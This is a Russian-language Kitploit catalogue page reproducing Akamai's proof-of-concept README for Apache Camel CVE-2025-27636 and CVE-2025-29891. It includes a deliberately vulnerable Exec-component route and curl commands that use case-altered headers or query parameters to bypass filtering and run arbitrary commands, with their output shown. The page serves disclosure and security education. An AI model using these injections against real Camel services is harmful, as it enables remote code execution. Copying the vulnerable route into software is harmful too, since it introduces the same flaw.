Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-27636-Apache-Camel-PoC — Доказательство концепции, демонстрирующее удалённое выполнение кода в Apache Camel путём обхода фильтрации заголовков и параметров (CVE-2025-27636, CVE-2025-29891) через компонент Exec. | Kitploit
Инструменты/GitHubGitHub/akamai/cve-2025-27636-apache-camel-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubakamai/cve-2025-27636-apache-camel-poc

CVE-2025-27636-Apache-Camel-PoC

Доказательство концепции, демонстрирующее удалённое выполнение кода в Apache Camel путём обхода фильтрации заголовков и параметров (CVE-2025-27636, CVE-2025-29891) через компонент Exec.

Репозиторий
421121 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Apache Camel CVE-2025–27636 и CVE-2025-29891 PoC

CVE-2025–27636 и CVE-2025-29891 — это уязвимости в Apache Camel, которые затрагивают версии: 4.10.0-4.10.1, 4.8.0-4.8.4, 3.10.0-3.22.3. Эксплуатация этих уязвимостей может позволить злоумышленникам выполнять внутренние методы Camel.

Далее представлен пример уязвимого приложения, которое использует компонент Camel Exec, который может быть использован для достижения RCE. Другие компоненты Camel могут быть использованы аналогичным образом.

Сборка

  1. Установите Java и Maven
  2. Соберите проект, выполнив:
root@kitploit:~
mvn clean package
  1. Запустите приложение:
root@kitploit:~
mvn exec:java -Dexec.mainClass=camel.vulnerable.VulnerableCamel

Эксплуатация CVE-2025–27636 и CVE-2025-29891

Приложение предоставляет HTTP-эндпоинт, предназначенный для выполнения команды "whoami" и возврата результата клиенту. Компонент Camel "Exec" настроен на выполнение команды, которая статически определена в коде.

root@kitploit:~
// recieve request from client and pass it to the "Exec" camel component
from("jetty:http://0.0.0.0:80/vulnerable")
.log("Received request from client")
// define a static command. This can be overwritten using the "CamelExecCommandExecutable" header
.to("exec:whoami") 
.convertBodyTo(String.class) 
.log("Command Output: ${body}");

CVE-2025–27636

Несмотря на то, что команда статична, мы можем перезаписать её, передав заголовок CamelExecCommandExecutable, который (как указано в документации) переопределяет статический URI. Apache Camel должен фильтровать такие заголовки, но из-за некорректной обработки регистра передача заголовка "CAmelExecCommandExecutable" обходит фильтр.

Выполнение следующей команды переопределит статическую команду "whoami" и вместо неё выполнит произвольную команду:

root@kitploit:~
$ curl "http://localhost:80/vulnerable" --header "CAmelExecCommandExecutable: ls"
pom.xml
src
target

Мы также можем передавать аргументы, указав заголовок CamelExecCommandArgs:

root@kitploit:~
$ curl "http://localhost:80/vulnerable" --header "CAmelExecCommandExecutable: ping" --header "CAmelExecCommandArgs: -c 2 8.8.8.8"
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=128 time=98.9 ms
64 bytes from 8.8.8.8: icmp_seq=2 ttl=128 time=46.4 ms

--- 8.8.8.8 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1012ms

Если мы передадим "нормальный" заголовок, мы заметим, что эксплуатация не удается и статическая команда "whoami" выполняется нормально:

root@kitploit:~
$ curl "http://localhost:80/vulnerable" --header "CamelExecCommandExecutable: ls"                                               
kali

CVE-2025–29891

Изначально считалось, что единственным вектором эксплуатации были заголовки запросов. Однако команда исследователей безопасности Akamai сообщила о дополнительном векторе команде разработчиков Apache Camel, что привело к присвоению CVE-2025-29891. Эта проблема проистекает из того же дефекта фильтрации, что и CVE-2025-27636, и позволяет вызывать внутренние методы через параметры запросов.

В следующем примере мы видим, что указание параметра запроса “CAmelExecCommandExecutable” приводит к произвольному выполнению команды — так же, как и исходный вектор заголовка:

root@kitploit:~
$ curl "http://localhost:80/vulnerable?CAmelExecCommandExecutable=ls"
pom.xml
src
target

Исходный патч, реализованный для исправления CVE-2025-27636, также решает эту проблему, поэтому приложения, использующие актуальные версии Apache Camel, не уязвимы к этому вектору эксплуатации.

Лицензия

Авторское право 2025 Akamai Technologies Inc.

Лицензировано на условиях Apache License, Version 2.0 ("Лицензия"); вы не можете использовать этот файл иначе как в соответствии с Лицензией. Вы можете получить копию Лицензии по адресу

root@kitploit:~
http://www.apache.org/licenses/LICENSE-2.0

Если это не требуется применимым законодательством или не согласовано в письменной форме, программное обеспечение распространяемое по Лицензии, распространяется на основе "AS IS" BASIS, БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ И УСЛОВИЙ, явных или подразумеваемых. См. Лицензию для получения информации о разрешениях и ограничениях по Лицензии.

Скачать инструмент